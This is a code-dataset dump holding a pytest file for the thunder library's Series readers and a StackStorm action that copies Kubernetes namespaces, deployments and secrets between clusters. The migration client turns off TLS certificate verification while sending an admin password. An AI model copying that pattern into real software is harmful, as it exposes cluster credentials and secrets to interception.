967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 650
|
2015-01-21T02:27:58.000Z
|
2022-03-01T11:10:44.000Z
|
test/test_series_io.py
|
gopikasula/thunder
|
967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 264
|
2015-01-20T21:32:41.000Z
|
2021-02-28T15:39:01.000Z
|
test/test_series_io.py
|
gopikasula/thunder
|
967ff8f3e7c2fabe1705743d95eb2746d4329786
|
[
"Apache-2.0"
] | 179
|
2015-01-20T10:02:04.000Z
|
2021-02-24T12:59:58.000Z
|
import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| 31.475177
| 79
| 0.627084
|
import pytest
import os
import glob
import json
from numpy import arange, array, allclose, save, savetxt
from bolt import array as barray
from thunder.series.readers import fromarray, fromtext, frombinary, fromexample
pytestmark = pytest.mark.usefixtures("eng")
def test_from_array(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_bolt(eng):
a = arange(8, dtype='int16').reshape((4, 2))
if eng is not None:
b = barray(a, context=eng)
else:
b = barray(a)
data = fromarray(b, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_vector(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, engine=eng)
assert data.shape == (4, 2)
assert data.dtype == 'int16'
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_array_index(eng):
a = arange(8, dtype='int16').reshape((4, 2))
data = fromarray(a, index=[2, 3], engine=eng)
assert allclose(data.index, [2, 3])
def test_from_text(tmpdir, eng):
v = [[0, i] for i in range(10)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, v, fmt='%.02g')
data = fromtext(f, engine=eng)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_text_skip(tmpdir):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = [kv[0] + kv[1] for kv in zip(k, v)]
f = os.path.join(str(tmpdir), 'data.txt')
savetxt(f, a, fmt='%.02g')
data = fromtext(f, skip=1)
assert allclose(data.shape, (10, 2))
assert data.dtype == 'float64'
assert allclose(data.toarray(), v)
def test_from_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[4, 2], dtype='int16', engine=eng)
assert allclose(data.shape, (4, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), a)
def test_from_binary_skip(tmpdir, eng):
k = [[i] for i in range(10)]
v = [[0, i] for i in range(10)]
a = array([kv[0] + kv[1] for kv in zip(k, v)], dtype='int16')
p = os.path.join(str(tmpdir), 'data.bin')
a.tofile(p)
data = frombinary(p, shape=[10, 2], dtype='int16', skip=1, engine=eng)
assert allclose(data.shape, (10, 2))
assert allclose(data.index, [0, 1])
assert allclose(data.toarray(), v)
def test_to_binary(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
fromarray(a, npartitions=1, engine=eng).tobinary(p)
files = [os.path.basename(f) for f in glob.glob(str(tmpdir) + '/data/*')]
assert sorted(files) == ['SUCCESS', 'conf.json', 'series-00000.bin']
with open(str(tmpdir) + '/data/conf.json', 'r') as f:
conf = json.load(f)
assert conf['shape'] == [4, 2]
assert conf['dtype'] == 'int16'
def test_to_binary_roundtrip(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_partitioned(tmpdir, eng):
a = arange(8, dtype='int16').reshape((4, 2))
p = str(tmpdir) + '/data'
data = fromarray([a, a], npartitions=4, engine=eng)
data.tobinary(p)
loaded = frombinary(p)
assert allclose(data.toarray(), loaded.toarray())
def test_to_binary_roundtrip_3d(tmpdir, eng):
a = arange(16, dtype='int16').reshape((4, 2, 2))
p = str(tmpdir) + '/data'
data = fromarray(a, npartitions=1, engine=eng)
data.tobinary(p)
loaded = frombinary(p, engine=eng)
assert allclose(data.toarray(), loaded.toarray())
def test_from_example(eng):
return
data = fromexample('fish', engine=eng)
assert allclose(data.toarray().shape, (76, 87, 2, 20))
data = fromexample('mouse', engine=eng)
assert allclose(data.toarray().shape, (64, 64, 20))
data = fromexample('iris', engine=eng)
assert allclose(data.toarray().shape, (150, 4))
| true
| true
|
f7191170b0bfdbd298bb18d8948c15bf555fe1c0
| 17,715
|
py
|
Python
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 5
|
2016-10-11T11:52:53.000Z
|
2017-06-15T05:21:05.000Z
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 25
|
2016-07-28T17:50:35.000Z
|
2017-09-25T09:26:18.000Z
|
packs/kubernetes/actions/migrate_cluster.py
|
pearsontechnology/st2contrib
|
f60ff517079b91de7ee84fdf91cd742784e2731e
|
[
"Apache-2.0"
] | 1
|
2017-05-05T19:12:01.000Z
|
2017-05-05T19:12:01.000Z
|
import json
import importlib
from datetime import datetime
import time
from st2actions.runners.pythonrunner import Action
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
class K8sMigrateAction(Action):
def run(
self,
ns_migration,
src_k8s_url,
src_k8s_password,
dst_k8s_url,
dst_k8s_password):
self.k8s_src = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
src_k8s_url,
src_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
src_k8s_url,
src_k8s_password))
self.k8s_dst = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
dst_k8s_url,
dst_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
dst_k8s_url,
dst_k8s_password))
def get_post_compare(datatype, name, **kwargs):
srcdata = self.get_data(self.k8s_src, datatype, ns=name)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print ("--------- Entering Retry Logic ----------------")
print "Re-querying desitination for datatype: '{0}'".format(datatype)
time.sleep(5) #Wait a brief moment and then query the destination again
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata: #Still not there, try a single repost
print "Retrying post to destination for datatype: '{0}'".format(datatype)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
time.sleep(10) #Wait a brief moment and then query the destination one last time before failing workflow
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Datatype '{0}' for namespace '{1}' exists on src but was not successfully migrated to destination".format(datatype,name)
raise Exception("Source Data was not created on Destination ")
#print ("Source Data:")
#print json.dumps(srcdata, sort_keys=True, indent=2, default=json_serial)
#print ("Destination Data:")
#print json.dumps(dstdata, sort_keys=True, indent=2, default=json_serial)
def post(data, datatype, **kwargs):
"""
Copy data from one cluster to another
:param object data: json object of data to be posted
:param str datatype: the type of k8s object (required)
:param str ns: k8s namespace (optional)
"""
# namespaces don't need a namespace argument when they're created
if datatype == "ns":
kwargs = {}
if datatype == "thirdparty":
print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
# split third party resources and post per namespace
for tpr in data:
print "++++"
print json.dumps(tpr, sort_keys=True, indent=2, default=json_serial)
print "++++"
if 'namespace' in tpr['metadata']:
kwargs['ns'] = tpr['metadata']['namespace']
if kwargs['ns'] in ['default', 'kube-system']:
print "not migrating 3pr system ns"
return
res = self.post_data(datatype, tpr, **kwargs)
else:
print "no namespace for %s - skipping" % tpr['metadata']['name']
else:
# post data to second cluster
res = self.post_data(datatype, data, **kwargs)
return res
#print "RESP:"
#print json.dumps(res, sort_keys=True, indent=2, default=json_serial)
nsdata = self.k8s_src[0].list_namespace().to_dict()
if ns_migration == "kube-system":
print "Operating on Namespace: kube-system"
get_post_compare("secret", ns_migration)
else:
for ns in nsdata['items']:
name = ns['metadata']['name']
if name in ['default', 'test-runner', 'kube-system']:
continue
else:
print "Operating on Namespace: " + name
get_post_compare("ns", name)
get_post_compare("service", name)
get_post_compare("deployments", name)
get_post_compare("ds", name)
get_post_compare("rc", name)
get_post_compare("secret", name)
get_post_compare("ingress", name)
get_post_compare("limitrange", name)
get_post_compare("resquota", name)
def get_data(self, target, datatype, **kwargs):
"""
Given a datatype and optional namespace, requests data from a kubernetes cluster
:param str datatype: type of k8s object
:param str ns: namespace to insert data to (optional)
:return: list of dicts with k8s data structures
"""
myfunc = self._lookup_func(datatype, "list")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(target[0])):
myapi = target[0]
if(myfunc in dir(target[1])):
myapi = target[1]
# third party resources don't need a namespace argument when they're queried,
# but will when posted. best to strip it out here
if datatype == "thirdparty":
kwargs = {}
# if a namespace is set, make the function call with it. return a dict
if "ns" in kwargs:
data = getattr(myapi, myfunc)(kwargs['ns']).to_dict()
else:
data = getattr(myapi, myfunc)().to_dict()
output = []
# print "^^^^^^^^^^^^^^^^^^^^"
# print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
# print "^^^^^^^^^^^^^^^^^^^^"
# a few calls return data with a slightly different structure
# we ignore this to keep consistancy when reinserting
if "items" not in data:
tmp = {}
tmp['items'] = []
tmp['items'].append(data)
data = tmp
# delete objects that shouldn't be transferred between clusters
if "items" in data:
for item in data['items']:
if "type" in item:
if item['type'] == "kubernetes.io/service-account-token":
continue
if "status" in item:
del item['status']
if "metadata" in item:
if "uid" in item['metadata']:
del item['metadata']['uid']
if "selfLink" in item['metadata']:
del item['metadata']['selfLink']
if "resourceVersion" in item['metadata']:
del item['metadata']['resourceVersion']
if "creationTimestamp" in item['metadata']:
del item['metadata']['creationTimestamp']
if "generation" in item['metadata']:
del item['metadata']['generation']
if "deletionGracePeriodSeconds" in item['metadata']:
del item['metadata']['deletionGracePeriodSeconds']
if "deletionTimestamp" in item['metadata']:
del item['metadata']['deletionTimestamp']
if "annotations" in item['metadata']:
del item['metadata']['annotations']
if "generateName" in item['metadata']:
del item['metadata']['generateName']
if "namespace" in item['metadata']:
del item['metadata']['namespace']
if "ownerReferences" in item['metadata']:
del item['metadata']['ownerReferences']
if "finalizers" in item['metadata']:
del item['metadata']['finalizers']
# if "labels" in item['metadata']:
# del item['metadata']['labels']
if "spec" in item:
if "finalizers" in item['spec']:
del item['spec']['finalizers']
if "template" in item['spec']:
if "spec" in item['spec']['template']:
if "generation" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['securityContext']
if "dnsPolicy" in item['spec']['template']['spec']:
del item['spec']['template'][
'spec']['dnsPolicy']
if "terminationGracePeriodSeconds" in item[
'spec']['template']['spec']:
del item['spec']['template']['spec'][
'terminationGracePeriodSeconds']
if "restartPolicy" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['restartPolicy']
if "containers" in item['spec']['template']['spec']:
for cont in item['spec']['template']['spec']['containers']:
if cont['livenessProbe'] is not None:
if "_exec" in cont['livenessProbe']:
cont['livenessProbe']['exec'] = cont['livenessProbe'].pop('_exec')
if "clusterIP" in item['spec']:
del item['spec']['clusterIP']
if "strategy" in item['spec']:
if "rollingUpdate" in item['spec']['strategy']:
if 'maxSurge' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxSurge']
if 'maxUnavailable' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxUnavailable']
output.append(item)
else:
output.append(data)
return output
def _lookup_func(self, func, functype):
"""
Given a k8s object, and an operation type, return the library function
This will break if the library changes..
:param str func: object type
:param str functype: choice between list (read) or create
:return: function name
"""
funcmap = {"ns": {"list": "read_namespace",
"create": "create_namespace"},
"service": {"list": "list_namespaced_service",
"create": "create_namespaced_service"},
"pod": {"list": "list_namespaced_pod",
"create": "create_namespaced_pod"},
"rc": {"list": "list_namespaced_replication_controller",
"create": "create_namespaced_replication_controller"},
"secret": {"list": "list_namespaced_secret",
"delete": "delete_namespaced_secret",
"create": "create_namespaced_secret"},
"ingress": {"list": "list_namespaced_ingress_0",
"create": "create_namespaced_ingress"},
"thirdparty": {"list": "list_third_party_resource",
"create": "create_namespaced_third_party_resource"},
"ds": {"list": "list_namespaced_daemon_set_0",
"create": "create_namespaced_daemon_set"},
"deployments": {"list": "list_namespaced_deployment_0",
"create": "create_namespaced_deployment"},
"rs": {"list": "list_namespaced_replica_set",
"create": "create_namespaced_replica_set"},
"endpoint": {"list": "list_namespaced_endpoints_20",
"create": "create_namespaced_endpoints"},
"pv": {"list": "list_persistent_volume",
"create": "create_persistent_volume"},
"pvclaim": {"list": "list_namespaced_persistent_volume_claim",
"create": "create_namespaced_persistent_volume_claim"},
"jobs": {"list": "list_namespaced_job_5",
"create": "create_namespaced_job"},
"hpa": {"list": "list_namespaced_horizontal_pod_autoscaler_3",
"create": "create_namespaced_horizontal_pod_autoscaler"},
"networkpol": {"list": "list_namespaced_network_policy",
"create": "create_namespaced_network_policy"},
"configmap": {"list": "list_namespaced_config_map_19",
"create": "create_namespaced_config_map"},
"limitrange": {"list": "list_namespaced_limit_range_0",
"create": "create_namespaced_limit_range"},
"podtemplate": {"list": "list_namespaced_pod_template",
"create": "create_namespaced_pod_template"},
"resquota": {"list": "list_namespaced_resource_quota",
"create": "create_namespaced_resource_quota"}
}
return funcmap[func][functype]
def post_data(self, datatype, body, **kwargs):
"""
Takes a datatype and structure, and posts it to the kubernetes cluster
:param str datatype: type of k8s object
:param str body: json structure
:param str ns: namespace to insert data to (optional)
:return: list of dicts with results for each input
"""
if datatype == 'secret':
mydeletefunc = self._lookup_func(datatype, "delete")
myfunc = self._lookup_func(datatype, "create")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(self.k8s_dst[0])):
myapi = self.k8s_dst[0]
if(myfunc in dir(self.k8s_dst[1])):
myapi = self.k8s_dst[1]
if "ns" in kwargs:
print "Posting Datatype {0} to namespace:{1}".format(datatype,kwargs['ns'])
else:
print "Posting Datatype {0}".format(datatype)
#print "body: "
#print json.dumps(body, sort_keys=True, indent=2, default=json_serial)
#print type(body)
output = []
for item in body:
#print "++++++++++++++"
#print json.dumps(item, sort_keys=True, indent=2, default=json_serial)
#print "++++++++++++++"
# if a namespace is set, make the function call with it. return a
# dict
if "ns" in kwargs:
myns = kwargs['ns']
if datatype == 'secret':
try:
getattr(myapi, mydeletefunc)(item, kwargs['ns'], item['metadata']['name']).to_dict()
except Exception:
continue
data = getattr(myapi, myfunc)(item, kwargs['ns']).to_dict()
if datatype == 'ns':
time.sleep(2)
else:
data = getattr(myapi, myfunc)(item).to_dict()
output.append(data)
return output
def _get_k8s_client(self, api_version, api_library, url, password):
api_version = importlib.import_module(api_version)
api_library = getattr(api_version, api_library)
api_version.Configuration().verify_ssl = False
api_version.Configuration().username = 'admin'
api_version.Configuration().password = password
host = url
apiclient = api_version.ApiClient(
host,
header_name="Authorization",
header_value=api_version.configuration.get_basic_auth_token())
apiclient.default_headers['Content-Type'] = 'application/json'
client = api_library(apiclient)
return client
| 46.253264
| 170
| 0.508439
|
import json
import importlib
from datetime import datetime
import time
from st2actions.runners.pythonrunner import Action
def json_serial(obj):
"""JSON serializer for objects not serializable by default json code"""
if isinstance(obj, datetime):
serial = obj.isoformat()
return serial
raise TypeError("Type not serializable")
class K8sMigrateAction(Action):
def run(
self,
ns_migration,
src_k8s_url,
src_k8s_password,
dst_k8s_url,
dst_k8s_password):
self.k8s_src = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
src_k8s_url,
src_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
src_k8s_url,
src_k8s_password))
self.k8s_dst = (
self._get_k8s_client(
'k8sv1',
'ApivApi',
dst_k8s_url,
dst_k8s_password),
self._get_k8s_client(
'k8sv1beta1',
'ApisextensionsvbetaApi',
dst_k8s_url,
dst_k8s_password))
def get_post_compare(datatype, name, **kwargs):
srcdata = self.get_data(self.k8s_src, datatype, ns=name)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print ("--------- Entering Retry Logic ----------------")
print "Re-querying desitination for datatype: '{0}'".format(datatype)
time.sleep(5)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Retrying post to destination for datatype: '{0}'".format(datatype)
try:
res = post(srcdata, datatype, ns=name)
except Exception as e:
print "Excepetion occurred when posting datatype '{0}' for namespace '{1}' to the destination K8S API. Reason: {2}".format(datatype,name,e.reason)
time.sleep(10)
dstdata = self.get_data(self.k8s_dst, datatype, ns=name)
if srcdata and not dstdata:
print "Datatype '{0}' for namespace '{1}' exists on src but was not successfully migrated to destination".format(datatype,name)
raise Exception("Source Data was not created on Destination ")
def post(data, datatype, **kwargs):
"""
Copy data from one cluster to another
:param object data: json object of data to be posted
:param str datatype: the type of k8s object (required)
:param str ns: k8s namespace (optional)
"""
if datatype == "ns":
kwargs = {}
if datatype == "thirdparty":
print json.dumps(data, sort_keys=True, indent=2, default=json_serial)
for tpr in data:
print "++++"
print json.dumps(tpr, sort_keys=True, indent=2, default=json_serial)
print "++++"
if 'namespace' in tpr['metadata']:
kwargs['ns'] = tpr['metadata']['namespace']
if kwargs['ns'] in ['default', 'kube-system']:
print "not migrating 3pr system ns"
return
res = self.post_data(datatype, tpr, **kwargs)
else:
print "no namespace for %s - skipping" % tpr['metadata']['name']
else:
res = self.post_data(datatype, data, **kwargs)
return res
nsdata = self.k8s_src[0].list_namespace().to_dict()
if ns_migration == "kube-system":
print "Operating on Namespace: kube-system"
get_post_compare("secret", ns_migration)
else:
for ns in nsdata['items']:
name = ns['metadata']['name']
if name in ['default', 'test-runner', 'kube-system']:
continue
else:
print "Operating on Namespace: " + name
get_post_compare("ns", name)
get_post_compare("service", name)
get_post_compare("deployments", name)
get_post_compare("ds", name)
get_post_compare("rc", name)
get_post_compare("secret", name)
get_post_compare("ingress", name)
get_post_compare("limitrange", name)
get_post_compare("resquota", name)
def get_data(self, target, datatype, **kwargs):
"""
Given a datatype and optional namespace, requests data from a kubernetes cluster
:param str datatype: type of k8s object
:param str ns: namespace to insert data to (optional)
:return: list of dicts with k8s data structures
"""
myfunc = self._lookup_func(datatype, "list")
if(myfunc in dir(target[0])):
myapi = target[0]
if(myfunc in dir(target[1])):
myapi = target[1]
if datatype == "thirdparty":
kwargs = {}
if "ns" in kwargs:
data = getattr(myapi, myfunc)(kwargs['ns']).to_dict()
else:
data = getattr(myapi, myfunc)().to_dict()
output = []
if "items" not in data:
tmp = {}
tmp['items'] = []
tmp['items'].append(data)
data = tmp
if "items" in data:
for item in data['items']:
if "type" in item:
if item['type'] == "kubernetes.io/service-account-token":
continue
if "status" in item:
del item['status']
if "metadata" in item:
if "uid" in item['metadata']:
del item['metadata']['uid']
if "selfLink" in item['metadata']:
del item['metadata']['selfLink']
if "resourceVersion" in item['metadata']:
del item['metadata']['resourceVersion']
if "creationTimestamp" in item['metadata']:
del item['metadata']['creationTimestamp']
if "generation" in item['metadata']:
del item['metadata']['generation']
if "deletionGracePeriodSeconds" in item['metadata']:
del item['metadata']['deletionGracePeriodSeconds']
if "deletionTimestamp" in item['metadata']:
del item['metadata']['deletionTimestamp']
if "annotations" in item['metadata']:
del item['metadata']['annotations']
if "generateName" in item['metadata']:
del item['metadata']['generateName']
if "namespace" in item['metadata']:
del item['metadata']['namespace']
if "ownerReferences" in item['metadata']:
del item['metadata']['ownerReferences']
if "finalizers" in item['metadata']:
del item['metadata']['finalizers']
# if "labels" in item['metadata']:
# del item['metadata']['labels']
if "spec" in item:
if "finalizers" in item['spec']:
del item['spec']['finalizers']
if "template" in item['spec']:
if "spec" in item['spec']['template']:
if "generation" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['securityContext']
if "dnsPolicy" in item['spec']['template']['spec']:
del item['spec']['template'][
'spec']['dnsPolicy']
if "terminationGracePeriodSeconds" in item[
'spec']['template']['spec']:
del item['spec']['template']['spec'][
'terminationGracePeriodSeconds']
if "restartPolicy" in item[
'spec']['template']['spec']:
del item['spec']['template'][
'spec']['restartPolicy']
if "containers" in item['spec']['template']['spec']:
for cont in item['spec']['template']['spec']['containers']:
if cont['livenessProbe'] is not None:
if "_exec" in cont['livenessProbe']:
cont['livenessProbe']['exec'] = cont['livenessProbe'].pop('_exec')
if "clusterIP" in item['spec']:
del item['spec']['clusterIP']
if "strategy" in item['spec']:
if "rollingUpdate" in item['spec']['strategy']:
if 'maxSurge' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxSurge']
if 'maxUnavailable' in item['spec']['strategy']['rollingUpdate']:
del item['spec']['strategy']['rollingUpdate']['maxUnavailable']
output.append(item)
else:
output.append(data)
return output
def _lookup_func(self, func, functype):
"""
Given a k8s object, and an operation type, return the library function
This will break if the library changes..
:param str func: object type
:param str functype: choice between list (read) or create
:return: function name
"""
funcmap = {"ns": {"list": "read_namespace",
"create": "create_namespace"},
"service": {"list": "list_namespaced_service",
"create": "create_namespaced_service"},
"pod": {"list": "list_namespaced_pod",
"create": "create_namespaced_pod"},
"rc": {"list": "list_namespaced_replication_controller",
"create": "create_namespaced_replication_controller"},
"secret": {"list": "list_namespaced_secret",
"delete": "delete_namespaced_secret",
"create": "create_namespaced_secret"},
"ingress": {"list": "list_namespaced_ingress_0",
"create": "create_namespaced_ingress"},
"thirdparty": {"list": "list_third_party_resource",
"create": "create_namespaced_third_party_resource"},
"ds": {"list": "list_namespaced_daemon_set_0",
"create": "create_namespaced_daemon_set"},
"deployments": {"list": "list_namespaced_deployment_0",
"create": "create_namespaced_deployment"},
"rs": {"list": "list_namespaced_replica_set",
"create": "create_namespaced_replica_set"},
"endpoint": {"list": "list_namespaced_endpoints_20",
"create": "create_namespaced_endpoints"},
"pv": {"list": "list_persistent_volume",
"create": "create_persistent_volume"},
"pvclaim": {"list": "list_namespaced_persistent_volume_claim",
"create": "create_namespaced_persistent_volume_claim"},
"jobs": {"list": "list_namespaced_job_5",
"create": "create_namespaced_job"},
"hpa": {"list": "list_namespaced_horizontal_pod_autoscaler_3",
"create": "create_namespaced_horizontal_pod_autoscaler"},
"networkpol": {"list": "list_namespaced_network_policy",
"create": "create_namespaced_network_policy"},
"configmap": {"list": "list_namespaced_config_map_19",
"create": "create_namespaced_config_map"},
"limitrange": {"list": "list_namespaced_limit_range_0",
"create": "create_namespaced_limit_range"},
"podtemplate": {"list": "list_namespaced_pod_template",
"create": "create_namespaced_pod_template"},
"resquota": {"list": "list_namespaced_resource_quota",
"create": "create_namespaced_resource_quota"}
}
return funcmap[func][functype]
def post_data(self, datatype, body, **kwargs):
"""
Takes a datatype and structure, and posts it to the kubernetes cluster
:param str datatype: type of k8s object
:param str body: json structure
:param str ns: namespace to insert data to (optional)
:return: list of dicts with results for each input
"""
if datatype == 'secret':
mydeletefunc = self._lookup_func(datatype, "delete")
myfunc = self._lookup_func(datatype, "create")
# lookup which api the function lives in and set that to be the api
# endpoint to use
if(myfunc in dir(self.k8s_dst[0])):
myapi = self.k8s_dst[0]
if(myfunc in dir(self.k8s_dst[1])):
myapi = self.k8s_dst[1]
if "ns" in kwargs:
print "Posting Datatype {0} to namespace:{1}".format(datatype,kwargs['ns'])
else:
print "Posting Datatype {0}".format(datatype)
#print "body: "
#print json.dumps(body, sort_keys=True, indent=2, default=json_serial)
#print type(body)
output = []
for item in body:
#print "++++++++++++++"
#print json.dumps(item, sort_keys=True, indent=2, default=json_serial)
#print "++++++++++++++"
# if a namespace is set, make the function call with it. return a
# dict
if "ns" in kwargs:
myns = kwargs['ns']
if datatype == 'secret':
try:
getattr(myapi, mydeletefunc)(item, kwargs['ns'], item['metadata']['name']).to_dict()
except Exception:
continue
data = getattr(myapi, myfunc)(item, kwargs['ns']).to_dict()
if datatype == 'ns':
time.sleep(2)
else:
data = getattr(myapi, myfunc)(item).to_dict()
output.append(data)
return output
def _get_k8s_client(self, api_version, api_library, url, password):
api_version = importlib.import_module(api_version)
api_library = getattr(api_version, api_library)
api_version.Configuration().verify_ssl = False
api_version.Configuration().username = 'admin'
api_version.Configuration().password = password
host = url
apiclient = api_version.ApiClient(
host,
header_name="Authorization",
header_value=api_version.configuration.get_basic_auth_token())
apiclient.default_headers['Content-Type'] = 'application/json'
client = api_library(apiclient)
return client
| false
| true
|
f719124569af67768775e9d2f1c0b713b0b7a884
| 4,855
|
py
|
Python
|
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
[
"BSD-3-Clause"
] | null | null | null |
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
